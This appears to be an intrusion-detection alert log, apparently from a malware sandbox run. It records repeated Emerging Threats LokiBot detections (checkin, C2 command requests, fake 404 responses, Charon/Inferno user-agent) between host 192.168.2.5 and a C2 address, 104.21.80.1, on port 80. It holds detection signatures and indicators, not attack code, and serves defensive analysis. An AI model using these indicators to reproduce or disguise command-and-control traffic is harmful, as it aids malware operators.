2025-02-25T15:37:44.600916+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49886	104.21.80.1	80	TCP
2025-02-25T15:37:44.606840+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49886	TCP
2025-02-25T15:37:45.768346+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49900	104.21.80.1	80	TCP
2025-02-25T15:37:45.768346+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49900	104.21.80.1	80	TCP
2025-02-25T15:37:45.768346+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49900	104.21.80.1	80	TCP
2025-02-25T15:37:46.548764+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49900	104.21.80.1	80	TCP
2025-02-25T15:37:46.548764+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49900	104.21.80.1	80	TCP
2025-02-25T15:37:46.553687+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49900	TCP
2025-02-25T15:37:47.703387+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49912	104.21.80.1	80	TCP
2025-02-25T15:37:47.703387+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49912	104.21.80.1	80	TCP
2025-02-25T15:37:47.703387+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49912	104.21.80.1	80	TCP
2025-02-25T15:37:48.492058+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49912	104.21.80.1	80	TCP
2025-02-25T15:37:48.492058+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49912	104.21.80.1	80	TCP
2025-02-25T15:37:48.500381+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49912	TCP
2025-02-25T15:37:49.658365+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49927	104.21.80.1	80	TCP
2025-02-25T15:37:49.658365+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49927	104.21.80.1	80	TCP
2025-02-25T15:37:49.658365+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49927	104.21.80.1	80	TCP
2025-02-25T15:37:50.279009+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49927	104.21.80.1	80	TCP
2025-02-25T15:37:50.279009+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49927	104.21.80.1	80	TCP
2025-02-25T15:37:50.284138+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49927	TCP
2025-02-25T15:37:51.470383+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49938	104.21.80.1	80	TCP
2025-02-25T15:37:51.470383+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49938	104.21.80.1	80	TCP
2025-02-25T15:37:51.470383+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49938	104.21.80.1	80	TCP
2025-02-25T15:37:52.092131+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49938	104.21.80.1	80	TCP
2025-02-25T15:37:52.092131+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49938	104.21.80.1	80	TCP
2025-02-25T15:37:52.097085+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49938	TCP
2025-02-25T15:37:53.252481+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49951	104.21.80.1	80	TCP
2025-02-25T15:37:53.252481+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49951	104.21.80.1	80	TCP
2025-02-25T15:37:53.252481+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49951	104.21.80.1	80	TCP
2025-02-25T15:37:54.032528+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49951	104.21.80.1	80	TCP
2025-02-25T15:37:54.032528+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49951	104.21.80.1	80	TCP
2025-02-25T15:37:54.037464+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49951	TCP
2025-02-25T15:37:55.190339+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49966	104.21.80.1	80	TCP
2025-02-25T15:37:55.190339+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49966	104.21.80.1	80	TCP
2025-02-25T15:37:55.190339+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49966	104.21.80.1	80	TCP
2025-02-25T15:37:55.982742+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49966	104.21.80.1	80	TCP
2025-02-25T15:37:55.982742+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49966	104.21.80.1	80	TCP
2025-02-25T15:37:55.989464+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	49966	TCP
2025-02-25T15:37:57.146055+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49981	104.21.80.1	80	TCP
2025-02-25T15:37:57.146055+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49981	104.21.80.1	80	TCP
2025-02-25T15:37:57.146055+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49981	104.21.80.1	80	TCP
2025-02-25T15:37:57.886134+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49981	104.21.80.1	80	TCP
2025-02-25T15:37:57.886134+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49981	104.21.80.1	80	TCP
2025-02-25T15:37:59.054566+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49993	104.21.80.1	80	TCP
2025-02-25T15:37:59.054566+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49993	104.21.80.1	80	TCP
2025-02-25T15:37:59.054566+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49993	104.21.80.1	80	TCP
2025-02-25T15:37:59.770383+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49993	104.21.80.1	80	TCP
2025-02-25T15:37:59.770383+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49993	104.21.80.1	80	TCP
2025-02-25T15:38:00.923982+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50004	104.21.80.1	80	TCP
2025-02-25T15:38:00.923982+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50004	104.21.80.1	80	TCP
2025-02-25T15:38:00.923982+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50004	104.21.80.1	80	TCP
2025-02-25T15:38:01.586779+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50004	104.21.80.1	80	TCP
2025-02-25T15:38:01.586779+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50004	104.21.80.1	80	TCP
2025-02-25T15:38:01.591707+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50004	TCP
2025-02-25T15:38:03.129955+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50007	104.21.80.1	80	TCP
2025-02-25T15:38:03.129955+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50007	104.21.80.1	80	TCP
2025-02-25T15:38:03.129955+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50007	104.21.80.1	80	TCP
2025-02-25T15:38:03.857568+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50007	104.21.80.1	80	TCP
2025-02-25T15:38:03.857568+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50007	104.21.80.1	80	TCP
2025-02-25T15:38:05.018828+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50008	104.21.80.1	80	TCP
2025-02-25T15:38:05.018828+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50008	104.21.80.1	80	TCP
2025-02-25T15:38:05.018828+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50008	104.21.80.1	80	TCP
2025-02-25T15:38:05.747097+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50008	104.21.80.1	80	TCP
2025-02-25T15:38:05.747097+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50008	104.21.80.1	80	TCP
2025-02-25T15:38:06.937484+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50009	104.21.80.1	80	TCP
2025-02-25T15:38:06.937484+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50009	104.21.80.1	80	TCP
2025-02-25T15:38:06.937484+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50009	104.21.80.1	80	TCP
2025-02-25T15:38:07.691018+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50009	104.21.80.1	80	TCP
2025-02-25T15:38:07.691018+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50009	104.21.80.1	80	TCP
2025-02-25T15:38:07.695990+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50009	TCP
2025-02-25T15:38:08.844857+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50010	104.21.80.1	80	TCP
2025-02-25T15:38:08.844857+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50010	104.21.80.1	80	TCP
2025-02-25T15:38:08.844857+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50010	104.21.80.1	80	TCP
2025-02-25T15:38:09.620745+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50010	104.21.80.1	80	TCP
2025-02-25T15:38:09.620745+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50010	104.21.80.1	80	TCP
2025-02-25T15:38:09.625716+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50010	TCP
2025-02-25T15:38:10.801171+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50011	104.21.80.1	80	TCP
2025-02-25T15:38:10.801171+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50011	104.21.80.1	80	TCP
2025-02-25T15:38:10.801171+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50011	104.21.80.1	80	TCP
2025-02-25T15:38:11.587199+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50011	104.21.80.1	80	TCP
2025-02-25T15:38:11.587199+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50011	104.21.80.1	80	TCP
2025-02-25T15:38:11.592157+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50011	TCP
2025-02-25T15:38:12.738105+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50012	104.21.80.1	80	TCP
2025-02-25T15:38:12.738105+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50012	104.21.80.1	80	TCP
2025-02-25T15:38:12.738105+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50012	104.21.80.1	80	TCP
2025-02-25T15:38:13.469240+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50012	104.21.80.1	80	TCP
2025-02-25T15:38:13.469240+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50012	104.21.80.1	80	TCP
2025-02-25T15:38:14.640871+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50013	104.21.80.1	80	TCP
2025-02-25T15:38:14.640871+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50013	104.21.80.1	80	TCP
2025-02-25T15:38:14.640871+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50013	104.21.80.1	80	TCP
2025-02-25T15:38:15.301113+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50013	104.21.80.1	80	TCP
2025-02-25T15:38:15.301113+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50013	104.21.80.1	80	TCP
2025-02-25T15:38:15.306085+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50013	TCP
2025-02-25T15:38:16.455340+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50014	104.21.80.1	80	TCP
2025-02-25T15:38:16.455340+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50014	104.21.80.1	80	TCP
2025-02-25T15:38:16.455340+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50014	104.21.80.1	80	TCP
2025-02-25T15:38:17.251007+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50014	104.21.80.1	80	TCP
2025-02-25T15:38:17.251007+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50014	104.21.80.1	80	TCP
2025-02-25T15:38:17.256006+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50014	TCP
2025-02-25T15:38:18.421744+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50015	104.21.80.1	80	TCP
2025-02-25T15:38:18.421744+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50015	104.21.80.1	80	TCP
2025-02-25T15:38:18.421744+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50015	104.21.80.1	80	TCP
2025-02-25T15:38:19.189291+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50015	104.21.80.1	80	TCP
2025-02-25T15:38:19.189291+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50015	104.21.80.1	80	TCP
2025-02-25T15:38:19.194866+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50015	TCP
2025-02-25T15:38:20.374351+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50016	104.21.80.1	80	TCP
2025-02-25T15:38:20.374351+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50016	104.21.80.1	80	TCP
2025-02-25T15:38:20.374351+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50016	104.21.80.1	80	TCP
2025-02-25T15:38:21.132720+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50016	104.21.80.1	80	TCP
2025-02-25T15:38:21.132720+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50016	104.21.80.1	80	TCP
2025-02-25T15:38:22.285474+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50017	104.21.80.1	80	TCP
2025-02-25T15:38:22.285474+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50017	104.21.80.1	80	TCP
2025-02-25T15:38:22.285474+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50017	104.21.80.1	80	TCP
2025-02-25T15:38:23.046794+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50017	104.21.80.1	80	TCP
2025-02-25T15:38:23.046794+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50017	104.21.80.1	80	TCP
2025-02-25T15:38:23.051658+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50017	TCP
2025-02-25T15:38:24.210909+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50018	104.21.80.1	80	TCP
2025-02-25T15:38:24.210909+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50018	104.21.80.1	80	TCP
2025-02-25T15:38:24.210909+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50018	104.21.80.1	80	TCP
2025-02-25T15:38:24.975433+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50018	104.21.80.1	80	TCP
2025-02-25T15:38:24.975433+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50018	104.21.80.1	80	TCP
2025-02-25T15:38:24.980448+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50018	TCP
2025-02-25T15:38:26.128727+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50019	104.21.80.1	80	TCP
2025-02-25T15:38:26.128727+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50019	104.21.80.1	80	TCP
2025-02-25T15:38:26.128727+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50019	104.21.80.1	80	TCP
2025-02-25T15:38:26.762045+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50019	104.21.80.1	80	TCP
2025-02-25T15:38:26.762045+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50019	104.21.80.1	80	TCP
2025-02-25T15:38:26.767054+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50019	TCP
2025-02-25T15:38:27.930674+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50020	104.21.80.1	80	TCP
2025-02-25T15:38:27.930674+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50020	104.21.80.1	80	TCP
2025-02-25T15:38:27.930674+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50020	104.21.80.1	80	TCP
2025-02-25T15:38:29.017491+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50020	104.21.80.1	80	TCP
2025-02-25T15:38:29.017491+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50020	104.21.80.1	80	TCP
2025-02-25T15:38:29.022378+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50020	TCP
2025-02-25T15:38:30.192910+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50021	104.21.80.1	80	TCP
2025-02-25T15:38:30.192910+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50021	104.21.80.1	80	TCP
2025-02-25T15:38:30.192910+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50021	104.21.80.1	80	TCP
2025-02-25T15:38:30.915398+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50021	104.21.80.1	80	TCP
2025-02-25T15:38:30.915398+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50021	104.21.80.1	80	TCP
2025-02-25T15:38:32.070314+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50022	104.21.80.1	80	TCP
2025-02-25T15:38:32.070314+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50022	104.21.80.1	80	TCP
2025-02-25T15:38:32.070314+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50022	104.21.80.1	80	TCP
2025-02-25T15:38:32.856227+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50022	104.21.80.1	80	TCP
2025-02-25T15:38:32.856227+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50022	104.21.80.1	80	TCP
2025-02-25T15:38:32.861222+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50022	TCP
2025-02-25T15:38:34.049302+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50023	104.21.80.1	80	TCP
2025-02-25T15:38:34.049302+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50023	104.21.80.1	80	TCP
2025-02-25T15:38:34.049302+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50023	104.21.80.1	80	TCP
2025-02-25T15:38:34.781548+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50023	104.21.80.1	80	TCP
2025-02-25T15:38:34.781548+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50023	104.21.80.1	80	TCP
2025-02-25T15:38:35.962917+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50024	104.21.80.1	80	TCP
2025-02-25T15:38:35.962917+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50024	104.21.80.1	80	TCP
2025-02-25T15:38:35.962917+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50024	104.21.80.1	80	TCP
2025-02-25T15:38:36.734248+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50024	104.21.80.1	80	TCP
2025-02-25T15:38:36.734248+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50024	104.21.80.1	80	TCP
2025-02-25T15:38:36.739222+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50024	TCP
2025-02-25T15:38:37.927242+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50025	104.21.80.1	80	TCP
2025-02-25T15:38:37.927242+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50025	104.21.80.1	80	TCP
2025-02-25T15:38:37.927242+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50025	104.21.80.1	80	TCP
2025-02-25T15:38:38.674351+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50025	104.21.80.1	80	TCP
2025-02-25T15:38:38.674351+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50025	104.21.80.1	80	TCP
2025-02-25T15:38:39.840894+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50026	104.21.80.1	80	TCP
2025-02-25T15:38:39.840894+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50026	104.21.80.1	80	TCP
2025-02-25T15:38:39.840894+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50026	104.21.80.1	80	TCP
2025-02-25T15:38:40.633202+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50026	104.21.80.1	80	TCP
2025-02-25T15:38:40.633202+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50026	104.21.80.1	80	TCP
2025-02-25T15:38:41.806917+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50027	104.21.80.1	80	TCP
2025-02-25T15:38:41.806917+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50027	104.21.80.1	80	TCP
2025-02-25T15:38:41.806917+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50027	104.21.80.1	80	TCP
2025-02-25T15:38:42.574819+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50027	104.21.80.1	80	TCP
2025-02-25T15:38:42.574819+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50027	104.21.80.1	80	TCP
2025-02-25T15:38:42.579719+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50027	TCP
2025-02-25T15:38:43.756691+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50028	104.21.80.1	80	TCP
2025-02-25T15:38:43.756691+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50028	104.21.80.1	80	TCP
2025-02-25T15:38:43.756691+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50028	104.21.80.1	80	TCP
2025-02-25T15:38:44.442666+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50028	104.21.80.1	80	TCP
2025-02-25T15:38:44.442666+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50028	104.21.80.1	80	TCP
2025-02-25T15:38:44.447602+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50028	TCP
2025-02-25T15:38:45.617770+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50029	104.21.80.1	80	TCP
2025-02-25T15:38:45.617770+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50029	104.21.80.1	80	TCP
2025-02-25T15:38:45.617770+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50029	104.21.80.1	80	TCP
2025-02-25T15:38:46.373803+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50029	104.21.80.1	80	TCP
2025-02-25T15:38:46.373803+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50029	104.21.80.1	80	TCP
2025-02-25T15:38:46.378746+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50029	TCP
2025-02-25T15:38:47.543151+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50030	104.21.80.1	80	TCP
2025-02-25T15:38:47.543151+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50030	104.21.80.1	80	TCP
2025-02-25T15:38:47.543151+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50030	104.21.80.1	80	TCP
2025-02-25T15:38:48.184312+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50030	104.21.80.1	80	TCP
2025-02-25T15:38:48.184312+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50030	104.21.80.1	80	TCP
2025-02-25T15:38:48.189651+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50030	TCP
2025-02-25T15:38:49.503055+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50031	104.21.80.1	80	TCP
2025-02-25T15:38:49.503055+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50031	104.21.80.1	80	TCP
2025-02-25T15:38:49.503055+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50031	104.21.80.1	80	TCP
2025-02-25T15:38:50.254935+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50031	104.21.80.1	80	TCP
2025-02-25T15:38:50.254935+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50031	104.21.80.1	80	TCP
2025-02-25T15:38:50.260788+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50031	TCP
2025-02-25T15:38:51.426845+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50032	104.21.80.1	80	TCP
2025-02-25T15:38:51.426845+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50032	104.21.80.1	80	TCP
2025-02-25T15:38:51.426845+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50032	104.21.80.1	80	TCP
2025-02-25T15:38:52.206854+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50032	104.21.80.1	80	TCP
2025-02-25T15:38:52.206854+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50032	104.21.80.1	80	TCP
2025-02-25T15:38:52.218782+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50032	TCP
2025-02-25T15:38:53.402371+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50033	104.21.80.1	80	TCP
